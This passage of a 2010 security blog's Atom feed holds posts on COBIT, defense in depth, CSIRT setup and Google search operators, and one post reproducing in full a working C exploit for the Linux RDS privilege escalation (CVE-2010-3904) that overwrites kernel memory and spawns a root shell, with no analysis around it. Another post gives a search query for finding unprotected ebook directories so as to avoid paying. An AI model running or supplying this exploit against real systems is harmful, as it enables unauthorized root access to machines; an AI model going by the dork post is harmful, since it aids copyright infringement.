type='text/html' href='http://shaolininteger.blogspot.com/2010/11/stop-killing-innovation.html' title='Stop Killing Innovation'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Z-tqVTd9fPI/R9-fNYzRCHI/AAAAAAAAAX4/DAaKfx9SC-M/s72-c/cio-logo_180x109.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6118300202962702531</id><published>2010-11-12T16:45:00.000+08:00</published><updated>2010-11-12T16:45:34.574+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Standards'/><title type='text'>COBIT-Framework: Basic Principle</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.monitor.co.at/ausgaben/2009_05/cobit~fs.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="142" src="http://www.monitor.co.at/ausgaben/2009_05/cobit~fs.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;COBIT is an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. COBIT enables clear policy development and good practice for IT control throughout organizations. COBIT emphasizes regulatory compliance, helps organizations to increase the value attained from IT, enables alignment and simplifies implementation of the COBIT framework.&lt;br /&gt;&lt;br /&gt;Business orientation is the main theme of COBIT. It is designed not only to be employed by IT service providers, users and auditors, but also, and more important, to provide comprehensive guidance for management and business process owners.&amp;nbsp;The COBIT framework is based on the following principle:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;"To provide the information that the enterprise&lt;b&gt; &lt;u&gt;requires&lt;/u&gt; to achieve its objectives&lt;/b&gt;, the enterprise needs to&lt;b&gt; invest in and manage and control &lt;u&gt;IT resources&lt;/u&gt;&lt;/b&gt; using a &lt;b&gt;structured set of &lt;u&gt;processes&lt;/u&gt;&lt;/b&gt; to provide the &lt;b&gt;&lt;u&gt;services&lt;/u&gt; that deliver&lt;/b&gt; the required &lt;b&gt;&lt;u&gt;enterprise information&lt;/u&gt;&lt;/b&gt;."&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6118300202962702531?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6118300202962702531/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6118300202962702531' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6118300202962702531'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6118300202962702531'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/11/cobit-framework-basic-principle.html' title='COBIT-Framework: Basic Principle'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6890423192609208432</id><published>2010-10-22T21:13:00.003+08:00</published><updated>2010-10-22T21:15:29.142+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><category scheme='http://www.blogger.com/atom/ns#' term='Book'/><title type='text'>Review for Network Security The Complete Reference</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://images.shopping.indiatimes.com/images/product/0070586713.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://images.shopping.indiatimes.com/images/product/0070586713.jpg" width="161" /&gt;&lt;/a&gt;&lt;/div&gt;I've been looking for "Onion Methodology" for past few weeks. &lt;b&gt;&lt;i&gt;Network Security The Complete Reference&lt;/i&gt;&lt;/b&gt; has it.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;"The Onion Model of Defense is a layered strategy, sometimes referred to as Defense in Depth. This model addresses the&amp;nbsp;contingency&amp;nbsp;of pa perimeter security breach&amp;nbsp;occurring."&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;"Consider what happens when an invader picks the front door lock or breaks a window to gain entry to a house? The homeowner may hide cash in a drawer and may store valuable jewels in a safe. These protective mechanisms address the contingency that the perimeter security fails. They also address the prospect of an inside job. The same principles apply to network security. What happens when an attacker gets past the firewall? What happens when a trusted insider, like an employee or a contractor, abuse their privileges? The onion model addresses these contingencies."&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Generally, the book is about a comprehensive resource that provide all the information necessary to formulate strategies to obtain and implement a network security program. A five star book.&lt;br&gt;&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6890423192609208432?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6890423192609208432/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6890423192609208432' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6890423192609208432'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6890423192609208432'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/10/review-for-network-security-complete.html' title='Review for Network Security The Complete Reference'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-9006701479164830745</id><published>2010-10-21T22:07:00.014+08:00</published><updated>2010-10-21T23:44:20.737+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>Linux RDS Protocol Local Privilege Escalation</title><content type='html'>&lt;pre class="brush: c;gutter:false;auto-links: false;;"&gt;/* &lt;br /&gt; * Linux Kernel &amp;lt;= 2.6.36-rc8 RDS privilege escalation exploit&lt;br /&gt; * CVE-2010-3904&lt;br /&gt; * by Dan Rosenberg &lt;drosenberg@vsecurity.com&gt;&lt;br /&gt; *&lt;br /&gt; * Copyright 2010 Virtual Security Research, LLC&lt;br /&gt; *&lt;br /&gt; * The handling functions for sending and receiving RDS messages&lt;br /&gt; * use unchecked __copy_*_user_inatomic functions without any&lt;br /&gt; * access checks on user-provided pointers.  As a result, by&lt;br /&gt; * passing a kernel address as an iovec base address in recvmsg-style&lt;br /&gt; * calls, a local user can overwrite arbitrary kernel memory, which&lt;br /&gt; * can easily be used to escalate privileges to root.  Alternatively,&lt;br /&gt; * an arbitrary kernel read can be performed via sendmsg calls.&lt;br /&gt; *&lt;br /&gt; * This exploit is simple - it resolves a few kernel symbols,&lt;br /&gt; * sets the security_ops to the default structure, then overwrites&lt;br /&gt; * a function pointer (ptrace_traceme) in that structure to point&lt;br /&gt; * to the payload.  After triggering the payload, the original&lt;br /&gt; * value is restored.  Hard-coding the offset of this function&lt;br /&gt; * pointer is a bit inelegant, but I wanted to keep it simple and&lt;br /&gt; * architecture-independent (i.e. no inline assembly).&lt;br /&gt; *&lt;br /&gt; * The vulnerability is yet another example of why you shouldn't&lt;br /&gt; * allow loading of random packet families unless you actually&lt;br /&gt; * need them.&lt;br /&gt; *&lt;br /&gt; * Greets to spender, kees, taviso, hawkes, team lollerskaters,&lt;br /&gt; * joberheide, bla, sts, and VSR&lt;br /&gt; *&lt;br /&gt; */&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;fcntl.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;#include &lt;errno.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;sys/ptrace.h&gt;&lt;br /&gt;#include &lt;sys/utsname.h&gt;&lt;br /&gt;&lt;br /&gt;#define RECVPORT 5555 &lt;br /&gt;#define SENDPORT 6666&lt;br /&gt;&lt;br /&gt;int prep_sock(int port)&lt;br /&gt;{&lt;br /&gt; &lt;br /&gt; int s, ret;&lt;br /&gt; struct sockaddr_in addr;&lt;br /&gt;&lt;br /&gt; s = socket(PF_RDS, SOCK_SEQPACKET, 0);&lt;br /&gt;&lt;br /&gt; if(s &amp;lt; 0) {&lt;br /&gt;  printf("[*] Could not open socket.\n");&lt;br /&gt;  exit(-1);&lt;br /&gt; }&lt;br /&gt; &lt;br /&gt; memset(&amp;amp;addr, 0, sizeof(addr));&lt;br /&gt;&lt;br /&gt; addr.sin_addr.s_addr = inet_addr("127.0.0.1");&lt;br /&gt; addr.sin_family = AF_INET;&lt;br /&gt; addr.sin_port = htons(port);&lt;br /&gt;&lt;br /&gt; ret = bind(s, (struct sockaddr *)&amp;amp;addr, sizeof(addr));&lt;br /&gt;&lt;br /&gt; if(ret &amp;lt; 0) {&lt;br /&gt;  printf("[*] Could not bind socket.\n");&lt;br /&gt;  exit(-1);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; return s;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void get_message(unsigned long address, int sock)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt; recvfrom(sock, (void *)address, sizeof(void *), 0,&lt;br /&gt;   NULL, NULL);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void send_message(unsigned long value, int sock)&lt;br /&gt;{&lt;br /&gt; &lt;br /&gt; int size, ret;&lt;br /&gt; struct sockaddr_in recvaddr;&lt;br /&gt; struct msghdr msg;&lt;br /&gt; struct iovec iov;&lt;br /&gt; unsigned long buf;&lt;br /&gt; &lt;br /&gt; memset(&amp;amp;recvaddr, 0, sizeof(recvaddr));&lt;br /&gt;&lt;br /&gt; size = sizeof(recvaddr);&lt;br /&gt;&lt;br /&gt; recvaddr.sin_port = htons(RECVPORT);&lt;br /&gt; recvaddr.sin_family = AF_INET;&lt;br /&gt; recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");&lt;br /&gt;&lt;br /&gt; memset(&amp;amp;msg, 0, sizeof(msg));&lt;br /&gt; &lt;br /&gt; msg.msg_name = &amp;amp;recvaddr;&lt;br /&gt; msg.msg_namelen = sizeof(recvaddr);&lt;br /&gt; msg.msg_iovlen = 1;&lt;br /&gt; &lt;br /&gt; buf = value;&lt;br /&gt;&lt;br /&gt; iov.iov_len = sizeof(buf);&lt;br /&gt; iov.iov_base = &amp;amp;buf;&lt;br /&gt;&lt;br /&gt; msg.msg_iov = &amp;amp;iov;&lt;br /&gt;&lt;br /&gt; ret = sendmsg(sock, &amp;amp;msg, 0);&lt;br /&gt; if(ret &amp;lt; 0) {&lt;br /&gt;  printf("[*] Something went wrong sending.\n");&lt;br /&gt;  exit(-1);&lt;br /&gt; }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt; if(!fork()) {&lt;br /&gt;   sleep(1);&lt;br /&gt;   send_message(value, sendsock);&lt;br /&gt;   exit(1);&lt;br /&gt; }&lt;br /&gt; else {&lt;br /&gt;  get_message(addr, recvsock);&lt;br /&gt;  wait(NULL);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);&lt;br /&gt;typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);&lt;br /&gt;_commit_creds commit_creds;&lt;br /&gt;_prepare_kernel_cred prepare_kernel_cred;&lt;br /&gt;&lt;br /&gt;int __attribute__((regparm(3)))&lt;br /&gt;getroot(void * file, void * vma)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt; commit_creds(prepare_kernel_cred(0));&lt;br /&gt; return -1; &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* thanks spender... */&lt;br /&gt;unsigned long get_kernel_sym(char *name)&lt;br /&gt;{&lt;br /&gt; FILE *f;&lt;br /&gt; unsigned long addr;&lt;br /&gt; char dummy;&lt;br /&gt; char sname[512];&lt;br /&gt; struct utsname ver;&lt;br /&gt; int ret;&lt;br /&gt; int rep = 0;&lt;br /&gt; int oldstyle = 0;&lt;br /&gt;&lt;br /&gt; f = fopen("/proc/kallsyms", "r");&lt;br /&gt; if (f == NULL) {&lt;br /&gt;  f = fopen("/proc/ksyms", "r");&lt;br /&gt;  if (f == NULL)&lt;br /&gt;   goto fallback;&lt;br /&gt;  oldstyle = 1;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;repeat:&lt;br /&gt; ret = 0;&lt;br /&gt; while(ret != EOF) {&lt;br /&gt;  if (!oldstyle)&lt;br /&gt;   ret = fscanf(f, "%p %c %s\n", (void **)&amp;amp;addr, &amp;amp;dummy, sname);&lt;br /&gt;  else {&lt;br /&gt;   ret = fscanf(f, "%p %s\n", (void **)&amp;amp;addr, sname);&lt;br /&gt;   if (ret == 2) {&lt;br /&gt;    char *p;&lt;br /&gt;    if (strstr(sname, "_O/") || strstr(sname, "_S."))&lt;br /&gt;     continue;&lt;br /&gt;    p = strrchr(sname, '_');&lt;br /&gt;    if (p &amp;gt; ((char *)sname + 5) &amp;amp;&amp;amp; !strncmp(p - 3, "smp", 3)) {&lt;br /&gt;     p = p - 4;&lt;br /&gt;     while (p &amp;gt; (char *)sname &amp;amp;&amp;amp; *(p - 1) == '_')&lt;br /&gt;      p--;&lt;br /&gt;     *p = '\0';&lt;br /&gt;    }&lt;br /&gt;   }&lt;br /&gt;  }&lt;br /&gt;  if (ret == 0) {&lt;br /&gt;   fscanf(f, "%s\n", sname);&lt;br /&gt;   continue;&lt;br /&gt;  }&lt;br /&gt;  if (!strcmp(name, sname)) {&lt;br /&gt;   fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");&lt;br /&gt;   fclose(f);&lt;br /&gt;   return addr;&lt;br /&gt;  }&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; fclose(f);&lt;br /&gt; if (rep)&lt;br /&gt;  return 0;&lt;br /&gt;fallback:&lt;br /&gt; /* didn't find the symbol, let's retry with the System.map&lt;br /&gt;    dedicated to the pointlessness of Russell Coker's SELinux&lt;br /&gt;    test machine (why does he keep upgrading the kernel if&lt;br /&gt;    "all necessary security can be provided by SE Linux"?)&lt;br /&gt; */&lt;br /&gt; uname(&amp;amp;ver);&lt;br /&gt; if (strncmp(ver.release, "2.6", 3))&lt;br /&gt;  oldstyle = 1;&lt;br /&gt; sprintf(sname, "/boot/System.map-%s", ver.release);&lt;br /&gt; f = fopen(sname, "r");&lt;br /&gt; if (f == NULL)&lt;br /&gt;  return 0;&lt;br /&gt; rep = 1;&lt;br /&gt; goto repeat;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main(int argc, char * argv[])&lt;br /&gt;{&lt;br /&gt; unsigned long sec_ops, def_ops, cap_ptrace, target;&lt;br /&gt; int sendsock, recvsock;&lt;br /&gt; struct utsname ver;&lt;br /&gt;&lt;br /&gt; printf("[*] Linux kernel &amp;gt;= 2.6.30 RDS socket exploit\n");&lt;br /&gt; printf("[*] by Dan Rosenberg\n");&lt;br /&gt;&lt;br /&gt; uname(&amp;amp;ver);&lt;br /&gt;&lt;br /&gt; if(strncmp(ver.release, "2.6.3", 5)) {&lt;br /&gt;  printf("[*] Your kernel is not vulnerable.\n");&lt;br /&gt;  return -1;&lt;br /&gt; } &lt;br /&gt;&lt;br /&gt; /* Resolve addresses of relevant symbols */&lt;br /&gt; printf("[*] Resolving kernel addresses...\n");&lt;br /&gt; sec_ops = get_kernel_sym("security_ops");&lt;br /&gt; def_ops = get_kernel_sym("default_security_ops");&lt;br /&gt; cap_ptrace = get_kernel_sym("cap_ptrace_traceme");&lt;br /&gt; commit_creds = (_commit_creds) get_kernel_sym("commit_creds");&lt;br /&gt; prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");&lt;br /&gt;&lt;br /&gt; if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {&lt;br /&gt;  printf("[*] Failed to resolve kernel symbols.\n");&lt;br /&gt;  return -1;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; /* Calculate target */&lt;br /&gt; target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) &amp;amp; ~(sizeof(void *) - 1));&lt;br /&gt;&lt;br /&gt; sendsock = prep_sock(SENDPORT);&lt;br /&gt; recvsock = prep_sock(RECVPORT);&lt;br /&gt;&lt;br /&gt; /* Reset security ops */&lt;br /&gt; printf("[*] Overwriting security ops...\n");&lt;br /&gt; write_to_mem(sec_ops, def_ops, sendsock, recvsock);&lt;br /&gt;&lt;br /&gt; /* Overwrite ptrace_traceme security op fptr */&lt;br /&gt; printf("[*] Overwriting function pointer...\n");&lt;br /&gt; write_to_mem(target, (unsigned long)&amp;amp;getroot, sendsock, recvsock);&lt;br /&gt;&lt;br /&gt; /* Trigger the payload */&lt;br /&gt; printf("[*] Triggering payload...\n");&lt;br /&gt; ptrace(PTRACE_TRACEME, 1, NULL, NULL);&lt;br /&gt; &lt;br /&gt; /* Restore the ptrace_traceme security op */&lt;br /&gt; printf("[*] Restoring function pointer...\n");&lt;br /&gt; write_to_mem(target, cap_ptrace, sendsock, recvsock);&lt;br /&gt;&lt;br /&gt; if(getuid()) {&lt;br /&gt;  printf("[*] Exploit failed to get root.\n");&lt;br /&gt;  return -1;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; printf("[*] Got root!\n");&lt;br /&gt; execl("/bin/sh", "sh", NULL);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-9006701479164830745?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/9006701479164830745/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=9006701479164830745' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/9006701479164830745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/9006701479164830745'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/10/linux-rds-protocol-local-privilege_21.html' title='Linux RDS Protocol Local Privilege Escalation'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3729999834511062261</id><published>2010-10-21T21:03:00.003+08:00</published><updated>2010-10-21T21:10:51.191+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Incident Management'/><title type='text'>Security Incident Response Team: CSIRT: Getting Start</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://ecx.images-amazon.com/images/I/41iLHR0zGLL._SL500_AA300_.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://ecx.images-amazon.com/images/I/41iLHR0zGLL._SL500_AA300_.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Action List for Developing a Computer&amp;nbsp;Security Incident Response Team (CSIRT)&lt;/b&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Identify stakeholders1 and participants.&lt;/li&gt;&lt;li&gt;Obtain management support and sponsorship.&lt;/li&gt;&lt;li&gt;Develop a CSIRT project plan.&lt;/li&gt;&lt;li&gt;Gather information.&lt;/li&gt;&lt;li&gt;Identify the CSIRT constituency.&lt;/li&gt;&lt;li&gt;Define the CSIRT mission.&lt;/li&gt;&lt;li&gt;Secure funding for CSIRT operations.&lt;/li&gt;&lt;li&gt;Decide on the range and level of services the CSIRT will offer.&lt;/li&gt;&lt;li&gt;Determine the CSIRT reporting structure, authority, and organizational&amp;nbsp;model.&lt;/li&gt;&lt;li&gt;Identify required resources such as staff, equipment, and infrastructure.&lt;/li&gt;&lt;li&gt;Define interactions and interfaces.&lt;/li&gt;&lt;li&gt;Define roles, responsibilities, and the corresponding authority.&lt;/li&gt;&lt;li&gt;Document the workflow.&lt;/li&gt;&lt;li&gt;Develop policies and corresponding procedures.&lt;/li&gt;&lt;li&gt;Create an implementation plan and solicit feedback.&lt;/li&gt;&lt;li&gt;Announce the CSIRT when it becomes operational.&lt;/li&gt;&lt;li&gt;Define methods for evaluating the performance of the CSIRT.&lt;/li&gt;&lt;li&gt;Have a backup plan for every element of the CSIRT.&lt;/li&gt;&lt;li&gt;Be flexible.&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3729999834511062261?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3729999834511062261/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3729999834511062261' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3729999834511062261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3729999834511062261'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/10/security-incident-management-response.html' title='Security Incident Response Team: CSIRT: Getting Start'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4376606081667857244</id><published>2010-10-05T22:57:00.004+08:00</published><updated>2010-10-05T23:03:26.387+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Google Dork: eBook</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_zPPJaS3LoQM/TKs84PWX6kI/AAAAAAAAAqg/tggMpWH4wf0/s1600/google-hacking.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="139" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/TKs84PWX6kI/AAAAAAAAAqg/tggMpWH4wf0/s200/google-hacking.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip)&lt;br /&gt;&lt;br /&gt;What does all of this mean? The -inurl htm and -inul html is attempting to get rid of regular webpages and show just index pages. Looking for index of in the title is doing the same. Using the pipe ( | ) tells google to look for something OR something else.&amp;nbsp;Here were are telling google to look for book or ebook directories… and we have listed several common ebook formats (zip, pdf, chf).&lt;br /&gt;&lt;br /&gt;If you would like to look for a particular author or title just tack it to the end of your search.&lt;br /&gt;&lt;br /&gt;Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip) +”o’reilly”&lt;br /&gt;&lt;br /&gt;This uses the same idea but attempts to focus on directories that contain O’Reilly stuff. It’s not perfect, but it’s better than paying.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4376606081667857244?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4376606081667857244/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4376606081667857244' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4376606081667857244'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4376606081667857244'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/10/google-inurlhtm-inurlhtml-intitleindex.html' title='Google Dork: eBook'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/TKs84PWX6kI/AAAAAAAAAqg/tggMpWH4wf0/s72-c/google-hacking.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6232259196097979923</id><published>2010-10-05T17:00:00.003+08:00</published><updated>2010-10-05T23:02:36.858+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Google Dork</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_0UUC-pmWcyE/THw11aypljI/AAAAAAAAAC4/0C1YIVSh_rI/s1600/google+hacking.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://1.bp.blogspot.com/_0UUC-pmWcyE/THw11aypljI/AAAAAAAAAC4/0C1YIVSh_rI/s200/google+hacking.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Google Calc:&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Google can also be used as a calculator, here are the few calculator operators that you can&lt;br /&gt;use to perform arithmetic operations in Google.&lt;br /&gt;&lt;br /&gt;+ , - , * , / , % of , ^&lt;br /&gt;&lt;br /&gt;Goto www.google.com and in the input box, type in the calculation that you want to perform,&lt;br /&gt;something like 8-5, Then you can get the appropriate result. Likewise you can use the rest of&lt;br /&gt;the Calculator operators.&lt;br /&gt;&lt;br /&gt;+ and - is not only meant for performing arithmetic operations, but you can use them to narrow down your search. Search for  hacking + ebooks this will search for both hacking and ebooks, but gives more priority for ebooks rather that  hacking.&lt;br /&gt;Search for hacking – cracking so that you can restrict cracking related sites and info while searching for hacking.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Searching for Phrase ?&lt;/b&gt;&lt;br /&gt;If you are searching for a phrase, then don’t forget to enclose it within quotes, it doesn’t matter, whatever the quote is, either single or double quote.&lt;br /&gt;“igconito” or ‘igconito’&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Wildcard search:&lt;/b&gt;&lt;br /&gt;You can use asterisk operator for wildcard search in Google that find that possible matches either in one or more words that is enclosed in the quotes.&lt;br /&gt;“adm*”&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Some other Google Opertors:&lt;/b&gt;&lt;br /&gt;Site:&lt;br /&gt;&lt;br /&gt;This operator is used for search only one website alone for particular result.                                                    hacking info site:www.microsoft.com This query will narrow down your search and will find some hacking related information on the site www.microsoft.com.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Num range:&lt;/b&gt;&lt;br /&gt;10….20&lt;br /&gt;When this query is given as input to the google, then it will search for a number that 